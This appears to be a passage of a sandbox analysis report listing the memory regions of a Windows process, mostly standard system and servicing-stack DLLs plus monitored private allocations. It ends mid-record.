0x7fffc34e1810 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\wdscore.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\wdscore.dll") Region: id = 4900 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4901 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4902 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4903 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4904 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4905 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4906 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4907 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4908 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4909 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4910 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4911 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4912 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4913 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4915 start_va = 0x7fffad520000 end_va = 0x7fffad79bfff monitored = 0 entry_point = 0x7fffad5514f0 region_type = mapped_file name = "cbscore.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\CbsCore.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\cbscore.dll") Region: id = 4916 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4917 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4918 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4919 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4920 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4921 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4922 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4923 start_va = 0x820000 end_va = 0xb57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4924 start_va = 0x630000 end_va = 0x63dfff monitored = 0 entry_point = 0x6313f0 region_type = mapped_file name = "cbsmsg.dll" filename = "\\Windows\\servicing\\CbsMsg.dll" (normalized: "c:\\windows\\servicing\\cbsmsg.dll") Region: id = 4925 start_va = 0x7fffbc710000 end_va = 0x7fffbc7c8fff monitored = 0 entry_point = 0x7fffbc75d820 region_type = mapped_file name = "dpx.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\dpx.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\dpx.dll") Region: id = 4926 start_va = 0x7fffa1e40000 end_va = 0x7fffa21effff monitored = 0 entry_point = 0x7fffa1f922c0 region_type = mapped_file name = "wcp.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\wcp.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\wcp.dll") Region: id = 4927 start_va = 0x7fffbc5e0000 end_va = 0x7fffbc640fff monitored = 0 entry_point = 0x7fffbc5e2090 region_type = mapped_file name = "drupdate.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\drupdate.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\drupdate.dll") Region: id = 4928 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4929 start_va = 0x7fffbcbe0000 end_va = 0x7fffbcbf6fff monitored = 0 entry_point = 0x7fffbcbed9f0 region_type = mapped_file name = "srclient.dll" filename = "\\Windows\\System32\\srclient.dll" (normalized: "c:\\windows\\system32\\srclient.dll") Region: id = 4930 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4931 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4932 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 4933 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 4934 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4935 start_va = 0x7fffbc6c0000 end_va = 0x7fffbc70afff monitored = 0 entry_point = 0x7fffbc6f5810 region_type = mapped_file name = "spp.dll" filename = "\\Windows\\System32\\spp.dll" (normalized: "c:\\windows\\system32\\spp.dll") Region: id = 4936 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4937 start_va = 0x7fffbe070000 end_va = 0x7fffbe20bfff monitored = 0 entry_point = 0x7fffbe085750 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 4938 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4939 start_va = 0x7fffbe850000 end_va = 0x7fffbe867fff monitored = 0 entry_point = 0x7fffbe851f50 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 4940 start_va = 0x640000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 4941 start_va = 0xb60000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 4942 start_va = 0xd60000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 4943 start_va = 0xef0000 end_va = 0xfb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 4944 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 4945 start_va = 0xfc0000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 4946 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4948 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4949 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4950 start_va = 0x1040000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4951 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4952 start_va = 0x1040000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4953 start_va = 0x1040000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4954 start_va = 0x1040000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4955 start_va = 0x1040000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4956 start_va = 0x1040000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4957 start_va = 0x1040000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4958 start_va = 0x1040000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4959 start_va = 0x1040000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4960 start_va = 0x1040000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4961 start_va = 0x1040000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4962 start_va = 0x670000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4963 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4964 start_va = 0x1040000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4965 start_va = 0x1040000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4966 start_va = 0x1040000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4967 start_va = 0x1040000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4968 start_va = 0x1040000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4969 start_va = 0x1040000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4970 start_va = 0x11b0000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 4971 start_va = 0x11c0000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 4972 start_va = 0x12c0000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4973 start_va = 0x1040000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4974 start_va = 0x1080000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 4975 start_va = 0x1040000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4976 start_va = 0x1040000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4977 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 4978 start_va = 0x1040000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4979 start_va = 0x1040000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4980 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 4981 start_va = 0x1040000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4982 start_va = 0x1040000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4983 start_va = 0x1040000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4984 start_va = 0x1040000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4985 start_va = 0x1040000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4986 start_va = 0x1040000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4987 start_va = 0x12c0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4988 start_va = 0x1040000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4989 start_va = 0x12c0000 end_va = 0x149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4990 start_va = 0x670000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4991 start_va = 0x670000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4992 start_va = 0x12c0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4993 start_va = 0x1040000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4994 start_va = 0x1040000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4995 start_va = 0x12c0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4996 start_va = 0x12c0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4997 start_va = 0x12c0000 end_va = 0x149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4998 start_va = 0x1040000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4999 start_va = 0x1040000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5000 start_va = 0x12c0000 end_va = 0x149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5001 start_va = 0x12c0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5002 start_va = 0x1040000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5003 start_va = 0x12c0000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5004 start_va = 0x1040000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5005 start_va = 0x12c0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5006 start_va = 0x12c0000 end_va = 0x14affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5007 start_va = 0x1040000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5008 start_va = 0x1040000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5009 start_va = 0x1040000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5010 start_va = 0x1040000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5011 start_va = 0x1040000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5012 start_va = 0x1040000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5013 start_va = 0x1040000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5014 start_va = 0x1040000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5015 start_va = 0x12c0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5016 start_va = 0x1040000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5017 start_va = 0x1040000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5018 start_va = 0x14c0000 end_va = 0x165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5019 start_va = 0x14c0000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5020 start_va = 0x14c0000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5021 start_va = 0x14c0000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5022 start_va = 0x1040000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5023 start_va = 0x1040000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5024 start_va = 0x1040000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5025 start_va = 0x1040000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5026 start_va = 0x1040000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5027 start_va = 0x1040000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5028 start_va = 0x1040000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5029 start_va = 0x1040000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5030 start_va = 0x1040000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5031 start_va = 0x1040000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5032 start_va = 0x1040000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5033 start_va = 0x1040000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5034 start_va = 0x1040000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5035 start_va = 0x1040000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5036 start_va = 0x1040000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5037 start_va = 0x1040000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5038 start_va = 0x1040000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5039 start_va = 0x1040000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5040 start_va = 0x1040000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5041 start_va = 0x14c0000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5042 start_va = 0x1040000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5043 start_va = 0x1040000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5044 start_va = 0x1040000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5045 start_va = 0x14c0000 end_va = 0x167ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5046 start_va = 0x1040000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5047 start_va = 0x1040000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5048 start_va = 0x1040000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5049 start_va = 0x14c0000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5050 start_va = 0x1040000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5051 start_va = 0x1040000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5052 start_va = 0x14c0000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5053 start_va = 0x14c0000 end_va = 0x165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5054 start_va = 0x1040000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5055 start_va = 0x1040000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5056 start_va = 0x1040000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5057 start_va = 0x7fffad490000 end_va = 0x7fffad514fff monitored = 0 entry_point = 0x7fffad4c3380 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\msdelta.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\msdelta.dll") Region: id = 5058 start_va = 0x1040000 end_va = 0x1144fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5059 start_va = 0x14c0000 end_va = 0x16c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5060 start_va = 0x16d0000 end_va = 0x17dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 5061 start_va = 0x1150000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 5066 start_va = 0x16d0000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 5067 start_va = 0x1150000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 5068 start_va = 